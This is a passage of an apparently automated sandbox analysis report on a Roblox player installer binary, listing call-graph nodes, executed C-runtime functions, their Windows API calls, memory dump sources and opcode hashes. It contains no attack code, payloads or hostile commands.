110a4ea 1748->1773 1752 1103c69 1750->1752 1796 110394f 1750->1796 1752->1505 1754 10ee394 1753->1754 1755 10ee3c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1754->1755 1756 10ee491 1755->1756 1865 10e2f6a 1756->1865 1758 10ee4af 1758->1503 1873 11042e4 1759->1873 1763 11037c4 ___free_lconv_mon 1762->1763 1768 1104802 EnterCriticalSection 1763->1768 1765 11037d2 1769 1103810 1765->1769 1768->1765 1772 110484a LeaveCriticalSection 1769->1772 1771 10f4631 1771->1505 1771->1711 1772->1771 1774 110a528 1773->1774 1778 110a4f8 ___free_lconv_mon 1773->1778 1775 10ee672 ___free_lconv_mon 14 API calls 1774->1775 1777 110a526 1775->1777 1776 110a513 RtlAllocateHeap 1776->1777 1776->1778 1777->1750 1778->1774 1778->1776 1779 11125ed ___free_lconv_mon 2 API calls 1778->1779 1779->1778 1800 10ee4c0 1780->1800 1783->1720 1785 1103b57 1784->1785 1786 1103b28 1784->1786 1863 110484a LeaveCriticalSection 1785->1863 1786->1730 1786->1736 1786->1741 1788->1726 1789->1740 1791 110a316 ___free_lconv_mon 14 API calls 1790->1791 1792 10ee664 1791->1792 1792->1747 1864 110484a LeaveCriticalSection 1793->1864 1795 1103d5c 1795->1750 1797 110395c 1796->1797 1799 1103975 1796->1799 1798 10ee672 ___free_lconv_mon 14 API calls 1797->1798 1797->1799 1798->1799 1799->1752 1801 10ee4d2 1800->1801 1806 10ee4f7 1801->1806 1803 10ee4ea 1817 10ee2b0 1803->1817 1807 10ee507 1806->1807 1808 10ee50e 1806->1808 1823 10ee315 GetLastError 1807->1823 1813 10ee51c 1808->1813 1827 10ee2ec 1808->1827 1811 10ee543 1811->1813 1830 10ee5a1 IsProcessorFeaturePresent 1811->1830 1813->1803 1814 10ee573 1815 10ee4c0 45 API calls 1814->1815 1816 10ee580 1815->1816 1816->1803 1818 10ee2bc 1817->1818 1819 10ee2d3 1818->1819 1856 10ee35b 1818->1856 1821 10ee35b 45 API calls 1819->1821 1822 10ee2e6 1819->1822 1821->1822 1822->1741 1824 10ee32e 1823->1824 1834 110a3c7 1824->1834 1828 10ee2f7 GetLastError SetLastError 1827->1828 1829 10ee310 1827->1829 1828->1811 1829->1811 1831 10ee5ad 1830->1831 1832 10ee378 8 API calls 1831->1832 1833 10ee5c2 GetCurrentProcess TerminateProcess 1832->1833 1833->1814 1835 110a3e0 1834->1835 1836 110a3da 1834->1836 1838 110cd5a ___free_lconv_mon 6 API calls 1835->1838 1842 10ee346 SetLastError 1835->1842 1837 110cd1b ___free_lconv_mon 6 API calls 1836->1837 1837->1835 1839 110a3fa 1838->1839 1840 110b99b ___free_lconv_mon 14 API calls 1839->1840 1839->1842 1841 110a40a 1840->1841 1843 110a412 1841->1843 1844 110a427 1841->1844 1842->1808 1845 110cd5a ___free_lconv_mon 6 API calls 1843->1845 1846 110cd5a ___free_lconv_mon 6 API calls 1844->1846 1847 110a41e 1845->1847 1848 110a433 1846->1848 1852 110a4b0 ___free_lconv_mon 14 API calls 1847->1852 1849 110a446 1848->1849 1850 110a437 1848->1850 1851 1109ff3 ___free_lconv_mon 14 API calls 1849->1851 1853 110cd5a ___free_lconv_mon 6 API calls 1850->1853 1854 110a451 1851->1854 1852->1842 1853->1847 1855 110a4b0 ___free_lconv_mon 14 API calls 1854->1855 1855->1842 1857 10ee36e 1856->1857 1858 10ee365 1856->1858 1857->1819 1859 10ee315 16 API calls 1858->1859 1860 10ee36a 1859->1860 1860->1857 1861 10f462c 45 API calls 1860->1861 1862 10ee377 1861->1862 1863->1786 1864->1795 1866 10e2f72 1865->1866 1867 10e2f73 IsProcessorFeaturePresent 1865->1867 1866->1758 1869 10e2fb5 1867->1869 1872 10e2f78 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1869->1872 1871 10e3098 1871->1758 1872->1871 1874 1104311 1873->1874 1875 1104323 1873->1875 1900 10e3398 GetModuleHandleW 1874->1900 1885 11041ac 1875->1885 1880 10f466f GetSystemTimeAsFileTime 1880->1510 1884 1104375 1886 11041b8 ___free_lconv_mon 1885->1886 1908 1104802 EnterCriticalSection 1886->1908 1888 11041c2 1909 11041f9 1888->1909 1890 11041cf 1913 11041ed 1890->1913 1893 110437b 1938 11043ac 1893->1938 1896 1104399 1898 11043ce 3 API calls 1896->1898 1897 1104389 GetCurrentProcess TerminateProcess 1897->1896 1899 11043a1 ExitProcess 1898->1899 1901 10e33a4 1900->1901 1901->1875 1902 11043ce GetModuleHandleExW 1901->1902 1903 110440d GetProcAddress 1902->1903 1904 110442e 1902->1904 1903->1904 1907 1104421 1903->1907 1905 1104434 FreeLibrary 1904->1905 1906 1104322 1904->1906 1905->1906 1906->1875 1907->1904 1908->1888 1910 1104205 ___free_lconv_mon 1909->1910 1911 110426c 1910->1911 1916 1107a3b 1910->1916 1911->1890 1937 110484a LeaveCriticalSection 1913->1937 1915 11041db 1915->1880 1915->1893 1917 1107a47 __EH_prolog3 1916->1917 1920 1107793 1917->1920 1919 1107a6e 1919->1911 1921 110779f ___free_lconv_mon 1920->1921 1928 1104802 EnterCriticalSection 1921->1928 1923 11077ad 1929 110794b 1923->1929 1928->1923 1930 11077ba 1929->1930 1931 110796a 1929->1931 1933 11077e2 1930->1933 1931->1930 1932 110a4b0 ___free_lconv_mon 14 API calls 1931->1932 1932->1930 1936 110484a LeaveCriticalSection 1933->1936 1935 11077cb 1935->1919 1936->1935 1937->1915 1943 110d13c GetPEB 1938->1943 1941 11043b6 GetPEB 1942 1104385 1941->1942 1942->1896 1942->1897 1944 110d156 1943->1944 1946 11043b1 1943->1946 1947 110cb4d 1944->1947 1946->1941 1946->1942 1948 110caca ___free_lconv_mon 5 API calls 1947->1948 1949 110cb69 1948->1949 1949->1946 1951 110caca ___free_lconv_mon 5 API calls 1950->1951 1952 110cba9 1951->1952 1952->1461 1954 110a316 ___free_lconv_mon 14 API calls 1953->1954 1957 10f44ff 1954->1957 1955 10f4541 ExitThread 1956 10f4518 1959 10f452b 1956->1959 1960 10f4524 CloseHandle 1956->1960 1957->1955 1957->1956 1962 110d03e 1957->1962 1959->1955 1961 10f4537 FreeLibraryAndExitThread 1959->1961 1960->1959 1961->1955 1963 110caca ___free_lconv_mon 5 API calls 1962->1963 1964 110d057 1963->1964 1964->1956 1983 112d7fb 1984 10e2f6a _ValidateLocalCookies 5 API calls 1983->1984 1985 112d80e 1984->1985 1986 110383b 1987 1103847 ___free_lconv_mon 1986->1987 1992 1104802 EnterCriticalSection 1987->1992 1989 1103856 1993 11038b6 1989->1993 1992->1989 1996 110484a LeaveCriticalSection 1993->1996 1995 11038a8 1996->1995 1965 10e6350 1966 10e636e 1965->1966 1979 10e6310 1966->1979 1968 10e641d 1969 10e63ee 1969->1968 1971 10e6310 _ValidateLocalCookies 5 API calls 1969->1971 1970 10e638c ___except_validate_context_record 1970->1968 1970->1969 1973 10e642a __IsNonwritableInCurrentImage 1970->1973 1971->1968 1972 10edfd0 RtlUnwind 1974 10e6477 1972->1974 1973->1972 1975 10e6310 _ValidateLocalCookies 5 API calls 1974->1975 1976 10e649d 1975->1976 1977 10e64c5 1976->1977 1978 10f31dc 14 API calls 1976->1978 1978->1977 1980 10e632f 1979->1980 1981 10e6322 1979->1981 1982 10e2f6a _ValidateLocalCookies 5 API calls 1981->1982 1982->1980 2000 10e2820 2003 10e34e2 2000->2003 2002 10e2825 2002->2002 2004 10e34f8 2003->2004 2006 10e3501 2004->2006 2007 10e3495 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2004->2007 2006->2002 2007->2006 2008 10edf40 2009 10edf52 2008->2009 2011 10edf60 2008->2011 2010 10e2f6a _ValidateLocalCookies 5 API calls 2009->2010 2010->2011

                                                                                                                  Callgraph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  • Opacity -> Relevance
                                                                                                                  • Disassembly available
                                                                                                                  callgraph 0 Function_01103810 31 Function_0110484A 0->31 1 Function_0110A316 4 Function_0110CD1B 1->4 26 Function_0110CD5A 1->26 56 Function_0110B99B 1->56 66 Function_0110A4B0 1->66 97 Function_01109FF3 1->97 2 Function_01113616 3 Function_0111261A 8 Function_01104802 3->8 35 Function_010E3450 3->35 49 Function_0111266D 3->49 88 Function_0110CACA 4->88 5 Function_0110381C 6 Function_01112F00 6->66 7 Function_010F461E 110 Function_010F44F4 7->110 9 Function_0110D003 9->88 10 Function_010EE315 87 Function_0110A3C7 10->87 11 Function_010E6310 40 Function_010E2F6A 11->40 12 Function_01108531 13 Function_010F462C 36 Function_010E2450 13->36 44 Function_0110447D 13->44 46 Function_010EE378 13->46 57 Function_01103980 13->57 86 Function_011039C5 13->86 14 Function_01107A3B 48 Function_010E3175 14->48 53 Function_01107793 14->53 58 Function_010E3198 14->58 15 Function_0110383B 15->8 15->35 69 Function_011038B6 15->69 16 Function_0110D13C 34 Function_0110CB4D 16->34 17 Function_0110D03E 17->88 18 Function_0111363F 18->66 74 Function_011131A1 18->74 19 Function_010E2820 102 Function_010E34E2 19->102 20 Function_010F443F 20->7 20->9 33 Function_01106E4C 20->33 20->35 85 Function_0110A1C5 20->85 98 Function_0110D0F8 20->98 21 Function_010E343D 22 Function_01103927 23 Function_01113451 23->2 24 Function_01103B51 24->31 25 Function_01103D55 25->31 26->88 27 Function_010F3142 28 Function_010EDF40 28->40 72 Function_010EDEA0 28->72 29 Function_010EE65F 29->1 30 Function_010EE35B 30->10 30->13 32 Function_0110794B 32->66 33->1 34->88 37 Function_010E6350 37->11 65 Function_010EDF90 37->65 75 Function_0111E1AA 37->75 80 Function_010EDFB0 37->80 84 Function_010F31DC 37->84 92 Function_010EDFD0 37->92 94 Function_0111DFF0 37->94 96 Function_010E72EC 37->96 114 Function_010EDFF0 37->114 38 Function_0110394F 50 Function_010EE672 38->50 39 Function_01113670 45 Function_010E2F78 40->45 41 Function_010EE268 42 Function_0110A17A 42->23 54 Function_01113699 42->54 93 Function_011134CE 42->93 43 Function_0110437B 77 Function_011043AC 43->77 91 Function_011043CE 43->91 105 Function_011042E4 44->105 46->21 46->40 51 Function_010E4270 46->51 47 Function_010EE574 83 Function_010EE4C0 47->83 49->31 50->1 52 Function_0111DF90 53->8 53->32 53->35 104 Function_011077E2 53->104 54->39 55 Function_01109F99 55->8 55->35 55->42 107 Function_01109FE7 55->107 56->50 67 Function_01109CB0 56->67 111 Function_011125ED 56->111 70 Function_011037B8 57->70 59 Function_010E3398 60 Function_01109E87 60->8 60->35 90 Function_01109ECD 60->90 61 Function_01112C86 61->66 62 Function_010E3495 63 Function_0110CB8D 63->88 64 Function_010E7490 66->50 89 Function_010EE5D5 66->89 68 Function_0111E0B0 69->31 70->0 70->8 70->35 71 Function_0112EBBF 71->40 72->64 79 Function_010E74B0 72->79 73 Function_010EE5A1 73->46 74->6 74->66 76 Function_011041AC 76->8 76->35 99 Function_011041F9 76->99 112 Function_011041ED 76->112 77->16 78 Function_010EE2B0 78->30 80->64 81 Function_011127D2 81->66 82 Function_00E82120 83->41 83->78 108 Function_010EE4F7 83->108 84->66 85->4 85->13 85->26 85->56 85->66 85->97 86->1 86->5 86->8 86->22 86->24 86->25 86->29 86->31 86->35 86->38 86->44 86->47 86->50 86->85 106 Function_011038E5 86->106 109 Function_0110A4EA 86->109 113 Function_010E3CF0 86->113 87->4 87->26 87->56 87->66 87->97 88->5 103 Function_0110C9FF 88->103 90->31 93->18 93->61 93->66 93->81 94->52 94->68 95 Function_010EE2EC 97->55 97->60 98->63 99->12 99->14 99->35 100 Function_0112D7FB 100->40 101 Function_010EDFE5 102->62 103->27 104->31 105->43 105->59 105->76 105->91 107->31 108->10 108->73 108->83 108->95 109->50 109->67 109->111 110->1 110->17 111->3 112->31 114->72

                                                                                                                  Executed Functions

                                                                                                                  Function 0110D0F8 Relevance: .0, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d25d989f1fe4a918cfae98fc46616e2cda2be0900d2787bccc965bad06740c5d
                                                                                                                  • Instruction ID: 7105f6525cf78442f4663c3c7f2771360481dd816cabf2de247b10d01351ddef
                                                                                                                  • Opcode Fuzzy Hash: d25d989f1fe4a918cfae98fc46616e2cda2be0900d2787bccc965bad06740c5d
                                                                                                                  • Instruction Fuzzy Hash: B8F03076A11224ABCF2BCA9CE405A9973A9EB49B65F114096F5019B281CBB4DD00DBD0
                                                                                                                  Function 0110C9FF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,5791E0C7,?,0110CB0C,?,?,?,00000000), ref: 0110CAC0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  • Opcode ID: d00b48f11b9680b11205625104f708d162776c1891ec7162337ed46cc0436f02
                                                                                                                  • Instruction ID: e56e11c510ef7bf2529b194b279bf9a548b57e09907b1283168ca8a89124e767
                                                                                                                  • Opcode Fuzzy Hash: d00b48f11b9680b11205625104f708d162776c1891ec7162337ed46cc0436f02
                                                                                                                  • Instruction Fuzzy Hash: BF21EB76E00215EBD73BDB69EC41B5A3768EB417A0B150764F912A72C4E7B0E981CBE0
                                                                                                                  Function 010F443F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(0121C1C8,0000000C), ref: 010F4452
                                                                                                                  • ExitThread.KERNEL32 ref: 010F4459
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 1611280651-1801386649
                                                                                                                  • Opcode ID: 04d8627d4491934ac82f5f9384a4795c75e0480b9044e607f6c164fbacf580db
                                                                                                                  • Instruction ID: b91f047f8bbe3944eeca720f36c1328c7a7d7d2fb3d559671eba610a2f639022
                                                                                                                  • Opcode Fuzzy Hash: 04d8627d4491934ac82f5f9384a4795c75e0480b9044e607f6c164fbacf580db
                                                                                                                  • Instruction Fuzzy Hash: D9F022B0940306AFDF1AEFB0C809A6F3BB0EF00610F204288F42197295CF706940DB51
                                                                                                                  Function 010F44F4 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 40 10f44f4-10f4501 call 110a316 43 10f4503-10f450b 40->43 44 10f4541-10f4544 ExitThread 40->44 43->44 45 10f450d-10f4511 43->45 46 10f4518-10f451e 45->46 47 10f4513 call 110d03e 45->47 49 10f452b-10f4531 46->49 50 10f4520-10f4522 46->50 47->46 49->44 52 10f4533-10f4535 49->52 50->49 51 10f4524-10f4525 CloseHandle 50->51 51->49 52->44 53 10f4537-10f453b FreeLibraryAndExitThread 52->53 53->44
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0110A316: GetLastError.KERNEL32(00000000,?,010EE677,0110B9ED,?,?,0110A212,00000001,00000364,?,00000006,000000FF,?,010F4464,0121C1C8,0000000C), ref: 0110A31A
                                                                                                                    • Part of subcall function 0110A316: SetLastError.KERNEL32(00000000), ref: 0110A3BC
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,010F462B,?,?,010F449D,00000000), ref: 010F4525
                                                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,010F462B,?,?,010F449D,00000000), ref: 010F453B
                                                                                                                  • ExitThread.KERNEL32 ref: 010F4544
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
